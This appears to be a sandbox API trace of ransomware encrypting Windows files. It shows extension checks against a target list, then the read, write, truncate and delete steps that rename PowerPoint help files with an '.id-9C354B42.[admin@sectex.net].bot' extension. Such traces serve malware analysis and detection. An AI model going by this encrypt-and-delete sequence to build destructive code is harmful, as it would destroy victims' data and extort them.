	[0149.850] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV.HXS") returned 64
	[0149.850] lstrlenW (lpString=".dbf") returned 4
	[0149.850] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1
	[0149.850] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV.HXS") returned 64
	[0149.850] lstrlenW (lpString=".1cd") returned 4
	[0149.850] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1
	[0149.850] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV.HXS") returned 64
	[0149.850] lstrlenW (lpString=".jpg") returned 4
	[0149.850] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1
	[0149.851] lstrcmpiW (lpString1=".HXC", lpString2=".bot") returned 1
	[0149.851] lstrlenW (lpString="POWERPNT.DEV_COL.HXC") returned 20
	[0149.851] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt.dev_col.hxc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0149.851] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=656) returned 1
	[0149.851] CloseHandle (hObject=0x384) returned 1
	[0149.851] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt.dev_col.hxc")) returned 0x20
	[0149.851] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_COL.HXC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt.dev_col.hxc.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.851] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt.dev_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0149.852] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.852] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.852] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_COL.HXC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt.dev_col.hxc.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec
	[0149.852] GetLastError () returned 0x0
	[0149.852] ReadFile (in: hFile=0x384, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x290, lpOverlapped=0x0) returned 1
	[0149.854] WriteFile (in: hFile=0x3ec, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x2a0, lpOverlapped=0x0) returned 1
	[0149.855] ReadFile (in: hFile=0x384, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0149.855] WriteFile (in: hFile=0x3ec, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xfc, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xfc, lpOverlapped=0x0) returned 1
	[0149.855] SetEndOfFile (hFile=0x3ec) returned 1
	[0149.855] CloseHandle (hObject=0x3ec) returned 1
	[0149.855] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.855] SetEndOfFile (hFile=0x384) returned 1
	[0149.858] CloseHandle (hObject=0x384) returned 1
	[0149.859] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_COL.HXC.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0149.859] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt.dev_col.hxc")) returned 1
	[0149.859] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_COL.HXC") returned 68
	[0149.859] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_COL.HXC") returned 68
	[0149.859] lstrlenW (lpString=".doc") returned 4
	[0149.860] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1
	[0149.860] lstrlenW (lpString=".docx") returned 5
	[0149.860] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1
	[0149.860] lstrlenW (lpString=".pdf") returned 4
	[0149.860] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1
	[0149.860] lstrlenW (lpString=".xls") returned 4
	[0149.860] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1
	[0149.860] lstrlenW (lpString=".xlsx") returned 5
	[0149.860] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1
	[0149.860] lstrlenW (lpString=".ppt") returned 4
	[0149.860] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1
	[0149.860] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_COL.HXC") returned 68
	[0149.860] lstrlenW (lpString=".zip") returned 4
	[0149.860] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1
	[0149.860] lstrlenW (lpString=".rar") returned 4
	[0149.860] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1
	[0149.860] lstrlenW (lpString=".bz2") returned 4
	[0149.860] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1
	[0149.860] lstrlenW (lpString=".7z") returned 3
	[0149.860] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1
	[0149.860] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_COL.HXC") returned 68
	[0149.860] lstrlenW (lpString=".dbf") returned 4
	[0149.860] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1
	[0149.860] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_COL.HXC") returned 68
	[0149.860] lstrlenW (lpString=".1cd") returned 4
	[0149.860] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1
	[0149.860] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_COL.HXC") returned 68
	[0149.860] lstrlenW (lpString=".jpg") returned 4
	[0149.860] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1
	[0149.860] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_COL.HXC") returned 68
	[0149.860] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_COL.HXC") returned 68
	[0149.861] lstrlenW (lpString=".doc") returned 4
	[0149.861] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1
	[0149.861] lstrlenW (lpString=".docx") returned 5
	[0149.861] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1
	[0149.861] lstrlenW (lpString=".pdf") returned 4
	[0149.861] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1
	[0149.861] lstrlenW (lpString=".xls") returned 4
	[0149.861] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1
	[0149.861] lstrlenW (lpString=".xlsx") returned 5
	[0149.861] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1
	[0149.861] lstrlenW (lpString=".ppt") returned 4
	[0149.861] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1
	[0149.861] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_COL.HXC") returned 68
	[0149.861] lstrlenW (lpString=".zip") returned 4
	[0149.861] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1
	[0149.861] lstrlenW (lpString=".rar") returned 4
	[0149.861] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1
	[0149.861] lstrlenW (lpString=".bz2") returned 4
	[0149.861] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1
	[0149.861] lstrlenW (lpString=".7z") returned 3
	[0149.861] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1
	[0149.861] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_COL.HXC") returned 68
	[0149.861] lstrlenW (lpString=".dbf") returned 4
	[0149.861] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1
	[0149.861] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_COL.HXC") returned 68
	[0149.862] lstrlenW (lpString=".1cd") returned 4
	[0149.862] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1
	[0149.862] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_COL.HXC") returned 68
	[0149.862] lstrlenW (lpString=".jpg") returned 4
	[0149.862] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1
	[0149.862] lstrcmpiW (lpString1=".HXT", lpString2=".bot") returned 1
	[0149.862] lstrlenW (lpString="POWERPNT.DEV_COL.HXT") returned 20
	[0149.862] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt.dev_col.hxt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0149.862] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=212) returned 1
	[0149.862] CloseHandle (hObject=0x384) returned 1
	[0149.862] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt.dev_col.hxt")) returned 0x20
	[0149.863] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_COL.HXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt.dev_col.hxt.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.863] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt.dev_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0149.863] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.863] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.863] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_COL.HXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt.dev_col.hxt.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec
	[0149.864] GetLastError () returned 0x0
	[0149.864] ReadFile (in: hFile=0x384, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0xd4, lpOverlapped=0x0) returned 1
	[0149.864] WriteFile (in: hFile=0x3ec, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xe0, lpOverlapped=0x0) returned 1
	[0149.865] ReadFile (in: hFile=0x384, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0149.865] WriteFile (in: hFile=0x3ec, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xfc, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xfc, lpOverlapped=0x0) returned 1
	[0149.865] SetEndOfFile (hFile=0x3ec) returned 1
	[0149.866] CloseHandle (hObject=0x3ec) returned 1
	[0149.866] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.866] SetEndOfFile (hFile=0x384) returned 1
	[0149.868] CloseHandle (hObject=0x384) returned 1
	[0149.868] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_COL.HXT.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0149.868] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt.dev_col.hxt")) returned 1
	[0149.869] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_COL.HXT") returned 68
	[0149.869] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_COL.HXT") returned 68
	[0149.869] lstrlenW (lpString=".doc") returned 4
	[0149.869] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1
	[0149.869] lstrlenW (lpString=".docx") returned 5
	[0149.869] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1
	[0149.869] lstrlenW (lpString=".pdf") returned 4
	[0149.869] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1
	[0149.869] lstrlenW (lpString=".xls") returned 4
	[0149.869] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1
	[0149.869] lstrlenW (lpString=".xlsx") returned 5
	[0149.869] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1
	[0149.869] lstrlenW (lpString=".ppt") returned 4
	[0149.869] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1
	[0149.869] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_COL.HXT") returned 68
	[0149.869] lstrlenW (lpString=".zip") returned 4
	[0149.869] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1
	[0149.869] lstrlenW (lpString=".rar") returned 4
	[0149.869] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1
	[0149.869] lstrlenW (lpString=".bz2") returned 4
	[0149.869] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1
	[0149.869] lstrlenW (lpString=".7z") returned 3
	[0149.870] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1
	[0149.870] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_COL.HXT") returned 68
	[0149.870] lstrlenW (lpString=".dbf") returned 4
	[0149.870] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1
	[0149.870] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_COL.HXT") returned 68
	[0149.870] lstrlenW (lpString=".1cd") returned 4
	[0149.870] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1
	[0149.870] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_COL.HXT") returned 68
	[0149.870] lstrlenW (lpString=".jpg") returned 4
	[0149.870] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1
	[0149.870] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_COL.HXT") returned 68
	[0149.870] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_COL.HXT") returned 68
	[0149.870] lstrlenW (lpString=".doc") returned 4
	[0149.870] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1
	[0149.870] lstrlenW (lpString=".docx") returned 5
	[0149.870] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1
	[0149.870] lstrlenW (lpString=".pdf") returned 4
	[0149.870] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1
	[0149.870] lstrlenW (lpString=".xls") returned 4
	[0149.870] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1
	[0149.870] lstrlenW (lpString=".xlsx") returned 5
	[0149.870] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1
	[0149.870] lstrlenW (lpString=".ppt") returned 4
	[0149.870] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1
	[0149.870] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_COL.HXT") returned 68
	[0149.870] lstrlenW (lpString=".zip") returned 4
	[0149.870] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1
	[0149.870] lstrlenW (lpString=".rar") returned 4
	[0149.870] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1
	[0149.870] lstrlenW (lpString=".bz2") returned 4
	[0149.871] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1
	[0149.871] lstrlenW (lpString=".7z") returned 3
	[0149.871] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1
	[0149.871] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_COL.HXT") returned 68
	[0149.871] lstrlenW (lpString=".dbf") returned 4
	[0149.871] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1
	[0149.871] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_COL.HXT") returned 68
	[0149.871] lstrlenW (lpString=".1cd") returned 4
	[0149.871] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1
	[0149.871] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_COL.HXT") returned 68
	[0149.871] lstrlenW (lpString=".jpg") returned 4
	[0149.871] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1
	[0149.871] lstrcmpiW (lpString1=".HXK", lpString2=".bot") returned 1
	[0149.871] lstrlenW (lpString="POWERPNT.DEV_F_COL.HXK") returned 22
	[0149.871] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt.dev_f_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0149.872] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=114) returned 1
	[0149.872] CloseHandle (hObject=0x384) returned 1
	[0149.872] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt.dev_f_col.hxk")) returned 0x20
	[0149.872] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt.dev_f_col.hxk.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.872] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt.dev_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0149.872] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.872] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.872] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt.dev_f_col.hxk.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec
	[0149.873] GetLastError () returned 0x0
	[0149.873] ReadFile (in: hFile=0x384, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x72, lpOverlapped=0x0) returned 1
	[0149.874] WriteFile (in: hFile=0x3ec, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x80, lpOverlapped=0x0) returned 1
	[0149.875] ReadFile (in: hFile=0x384, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0149.875] WriteFile (in: hFile=0x3ec, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x100, lpOverlapped=0x0) returned 1
	[0149.875] SetEndOfFile (hFile=0x3ec) returned 1
	[0149.875] CloseHandle (hObject=0x3ec) returned 1
	[0149.875] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.875] SetEndOfFile (hFile=0x384) returned 1
	[0149.878] CloseHandle (hObject=0x384) returned 1
	[0149.878] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0149.878] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt.dev_f_col.hxk")) returned 1
	[0149.878] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_F_COL.HXK") returned 70
	[0149.878] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_F_COL.HXK") returned 70
	[0149.878] lstrlenW (lpString=".doc") returned 4
	[0149.879] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0149.879] lstrlenW (lpString=".docx") returned 5
	[0149.879] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0149.879] lstrlenW (lpString=".pdf") returned 4
	[0149.879] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0149.879] lstrlenW (lpString=".xls") returned 4
	[0149.879] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0149.879] lstrlenW (lpString=".xlsx") returned 5
	[0149.879] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0149.879] lstrlenW (lpString=".ppt") returned 4
	[0149.879] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0149.879] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_F_COL.HXK") returned 70
	[0149.879] lstrlenW (lpString=".zip") returned 4
	[0149.879] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0149.879] lstrlenW (lpString=".rar") returned 4
	[0149.879] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0149.879] lstrlenW (lpString=".bz2") returned 4
	[0149.879] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0149.879] lstrlenW (lpString=".7z") returned 3
	[0149.879] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0149.879] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_F_COL.HXK") returned 70
	[0149.879] lstrlenW (lpString=".dbf") returned 4
	[0149.879] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0149.879] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_F_COL.HXK") returned 70
	[0149.879] lstrlenW (lpString=".1cd") returned 4
	[0149.879] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0149.879] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_F_COL.HXK") returned 70
	[0149.879] lstrlenW (lpString=".jpg") returned 4
	[0149.879] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0149.879] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_F_COL.HXK") returned 70
	[0149.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_F_COL.HXK") returned 70
	[0149.880] lstrlenW (lpString=".doc") returned 4
	[0149.880] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0149.880] lstrlenW (lpString=".docx") returned 5
	[0149.880] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0149.880] lstrlenW (lpString=".pdf") returned 4
	[0149.880] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0149.880] lstrlenW (lpString=".xls") returned 4
	[0149.880] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0149.880] lstrlenW (lpString=".xlsx") returned 5
	[0149.880] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0149.880] lstrlenW (lpString=".ppt") returned 4
	[0149.880] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0149.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_F_COL.HXK") returned 70
	[0149.880] lstrlenW (lpString=".zip") returned 4
	[0149.880] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0149.880] lstrlenW (lpString=".rar") returned 4
	[0149.880] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0149.880] lstrlenW (lpString=".bz2") returned 4
	[0149.880] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0149.880] lstrlenW (lpString=".7z") returned 3
	[0149.880] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
